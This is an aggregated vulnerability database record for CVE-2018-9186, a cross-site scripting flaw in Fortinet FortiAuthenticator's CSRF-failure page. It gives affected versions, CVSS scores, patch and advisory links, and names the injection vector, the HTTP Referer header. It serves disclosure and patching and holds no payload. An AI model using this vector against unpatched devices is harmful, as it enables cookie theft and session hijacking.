ID

VAR-201805-1018


CVE

CVE-2018-9186


TITLE

Fortinet FortiAuthenticator Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2018-005463

DESCRIPTION

A cross-site scripting (XSS) vulnerability in Fortinet FortiAuthenticator in versions 4.0.0 to before 5.3.0 "CSRF validation failure" page allows attacker to execute unauthorized script code via inject malicious scripts in HTTP referer header. Fortinet FortiAuthenticator Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. FortinetFortiAuthenticator is a user identity management device that enhances enterprise security by simplifying and centralizing the management and storage of user identity information. A cross-site scripting vulnerability exists in the \"CSRF Authentication Failed\" page in FortinetFortiAuthenticator prior to 5.3.0. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Versions prior to FortiAuthenticator 5.3.0 are vulnerable. Fortinet FortiAuthenticator is a series of security authentication software from Fortinet, which can be combined with FortiToken (two-factor authentication token) to provide secure two-factor authentication to third-party devices authenticated by RADIUS or LDAP

Trust: 2.52

sources: NVD: CVE-2018-9186 // JVNDB: JVNDB-2018-005463 // CNVD: CNVD-2018-10945 // BID: 104371 // VULHUB: VHN-139218

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2018-10945

AFFECTED PRODUCTS

vendor:fortinetmodel:fortiauthenticatorscope:ltversion:5.3.0

Trust: 2.4

vendor:fortinetmodel:fortiauthenticatorscope:gteversion:4.0.0

Trust: 1.0

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:3.0.0

Trust: 0.9

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:5.2

Trust: 0.3

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:5.1

Trust: 0.3

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:5.0

Trust: 0.3

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:4.3

Trust: 0.3

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:4.2

Trust: 0.3

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:3.2.1

Trust: 0.3

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:3.2

Trust: 0.3

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:3.1

Trust: 0.3

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:3.0.2

Trust: 0.3

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:3.0

Trust: 0.3

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:2.0

Trust: 0.3

vendor:fortinetmodel:fortiauthenticatorscope:eqversion:1.0

Trust: 0.3

vendor:fortinetmodel:fortiauthenticatorscope:neversion:5.3

Trust: 0.3

sources: CNVD: CNVD-2018-10945 // BID: 104371 // JVNDB: JVNDB-2018-005463 // CNNVD: CNNVD-201805-1164 // NVD: CVE-2018-9186

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-9186
value: MEDIUM

Trust: 1.0

NVD: CVE-2018-9186
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2018-10945
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201805-1164
value: MEDIUM

Trust: 0.6

VULHUB: VHN-139218
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2018-9186
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2018-10945
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-139218
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-9186
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2018-10945 // VULHUB: VHN-139218 // JVNDB: JVNDB-2018-005463 // CNNVD: CNNVD-201805-1164 // NVD: CVE-2018-9186

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-139218 // JVNDB: JVNDB-2018-005463 // NVD: CVE-2018-9186

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201805-1164

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-201805-1164

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-005463

PATCH

title:FG-IR-18-059url:https://fortiguard.com/psirt/FG-IR-18-059

Trust: 0.8

title:Patch for FortinetFortiAuthenticator Cross-Site Scripting Vulnerability (CNVD-2018-10945)url:https://www.cnvd.org.cn/patchInfo/show/131119

Trust: 0.6

title:Fortinet FortiAuthenticator Fixes for cross-site scripting vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81182

Trust: 0.6

sources: CNVD: CNVD-2018-10945 // JVNDB: JVNDB-2018-005463 // CNNVD: CNNVD-201805-1164

EXTERNAL IDS

db:NVDid:CVE-2018-9186

Trust: 3.4

db:BIDid:104371

Trust: 2.0

db:JVNDBid:JVNDB-2018-005463

Trust: 0.8

db:CNNVDid:CNNVD-201805-1164

Trust: 0.7

db:CNVDid:CNVD-2018-10945

Trust: 0.6

db:VULHUBid:VHN-139218

Trust: 0.1

sources: CNVD: CNVD-2018-10945 // VULHUB: VHN-139218 // BID: 104371 // JVNDB: JVNDB-2018-005463 // CNNVD: CNNVD-201805-1164 // NVD: CVE-2018-9186

REFERENCES

url:http://www.securityfocus.com/bid/104371

Trust: 1.7

url:https://fortiguard.com/advisory/fg-ir-18-059

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2018-9186

Trust: 1.4

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-9186

Trust: 0.8

url:http://www.fortinet.com/

Trust: 0.3

url:https://fortiguard.com/psirt/fg-ir-18-059

Trust: 0.3

sources: CNVD: CNVD-2018-10945 // VULHUB: VHN-139218 // BID: 104371 // JVNDB: JVNDB-2018-005463 // CNNVD: CNNVD-201805-1164 // NVD: CVE-2018-9186

CREDITS

Arun Narayanan

Trust: 0.3

sources: BID: 104371

SOURCES

db:CNVDid:CNVD-2018-10945
db:VULHUBid:VHN-139218
db:BIDid:104371
db:JVNDBid:JVNDB-2018-005463
db:CNNVDid:CNNVD-201805-1164
db:NVDid:CVE-2018-9186

LAST UPDATE DATE

2024-08-14T14:12:52.255000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2018-10945date:2018-06-05T00:00:00
db:VULHUBid:VHN-139218date:2019-04-22T00:00:00
db:BIDid:104371date:2018-05-31T00:00:00
db:JVNDBid:JVNDB-2018-005463date:2018-07-18T00:00:00
db:CNNVDid:CNNVD-201805-1164date:2019-04-23T00:00:00
db:NVDid:CVE-2018-9186date:2019-04-22T18:32:14.473

SOURCES RELEASE DATE

db:CNVDid:CNVD-2018-10945date:2018-06-05T00:00:00
db:VULHUBid:VHN-139218date:2018-05-31T00:00:00
db:BIDid:104371date:2018-05-31T00:00:00
db:JVNDBid:JVNDB-2018-005463date:2018-07-18T00:00:00
db:CNNVDid:CNNVD-201805-1164date:2018-05-31T00:00:00
db:NVDid:CVE-2018-9186date:2018-05-31T22:29:00.253